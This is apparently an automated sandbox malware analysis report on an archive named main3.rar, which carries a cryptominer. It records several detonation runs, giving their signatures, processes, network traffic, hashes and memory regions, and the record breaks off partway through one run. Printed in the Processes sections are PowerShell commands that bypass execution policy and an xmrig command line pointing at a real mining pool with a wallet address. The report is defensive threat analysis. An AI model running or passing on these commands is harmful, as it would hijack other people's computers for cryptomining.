Malware Analysis Report

2024-11-16 12:06

Sample ID 240528-b9dx7abe72
Target main3.rar
SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Tags
execution xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88

Threat Level: Known bad

The file main3.rar was found to be: Known bad.

Malicious Activity Summary

execution xmrig miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-28 01:50

Signatures

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win11-20240508-en

Max time kernel

1759s

Max time network

1771s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4852-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoi34s1j.igp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4852-9-0x0000020BE5780000-0x0000020BE57A2000-memory.dmp

memory/4852-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/4852-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/4852-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/4852-13-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/4852-14-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:15

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 8.24.18.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4252-3-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp

memory/4252-5-0x0000010CE9E40000-0x0000010CE9E62000-memory.dmp

memory/4252-6-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-9-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-10-0x0000010CE9FF0000-0x0000010CEA066000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dllvs5e.sl2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4252-25-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-48-0x0000010CEA190000-0x0000010CEA1A2000-memory.dmp

memory/4252-61-0x0000010CE9FE0000-0x0000010CE9FEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3968-90-0x000001C4BF560000-0x000001C4BF580000-memory.dmp

memory/3968-91-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-92-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/4252-93-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-94-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp

memory/4252-95-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/3968-96-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-97-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-98-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-99-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-100-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-101-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-102-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-103-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-104-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-105-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-106-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-107-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-108-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-109-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-110-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-111-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-112-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-113-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-114-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-115-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-116-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-117-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-118-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-119-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-120-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-121-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-122-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-123-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-124-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-125-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-126-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-127-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-128-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-129-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-130-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-131-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-132-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-133-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-134-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-135-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-136-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-137-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-138-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-139-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-140-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-141-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-142-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-143-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-144-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-145-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-146-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-147-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-148-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-149-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-150-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-151-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-152-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-153-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-154-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-155-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-156-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:17

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 9.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp

Files

memory/2916-2-0x00007FF931353000-0x00007FF931354000-memory.dmp

memory/2916-5-0x00000146412F0000-0x0000014641312000-memory.dmp

memory/2916-6-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-7-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-10-0x00000146414A0000-0x0000014641516000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtddsseb.dc4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2916-25-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-48-0x0000014641520000-0x0000014641532000-memory.dmp

memory/2916-61-0x0000014641490000-0x000001464149A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2848-90-0x0000022E6EAE0000-0x0000022E6EB00000-memory.dmp

memory/2848-91-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2916-92-0x00007FF931353000-0x00007FF931354000-memory.dmp

memory/2916-93-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2848-94-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2916-95-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2848-96-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-97-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-98-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-99-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-100-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-101-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-102-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-103-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-104-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-105-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-106-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-107-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-108-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-109-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-110-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-111-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-112-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-113-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-114-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-115-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-116-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-117-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-118-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-119-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-120-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-121-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-122-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-123-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-124-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-125-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-126-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-127-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-128-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-129-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-130-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-131-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-132-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-133-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-134-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-135-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-136-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-137-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-138-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-139-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-140-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-141-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-142-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-143-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-144-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-145-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-146-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-147-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-148-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-149-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-150-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-151-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-152-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-153-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-154-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-155-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2848-156-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:05

Platform

win11-20240508-en

Max time kernel

1709s

Max time network

1719s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/5064-0-0x00007FFA49493000-0x00007FFA49495000-memory.dmp

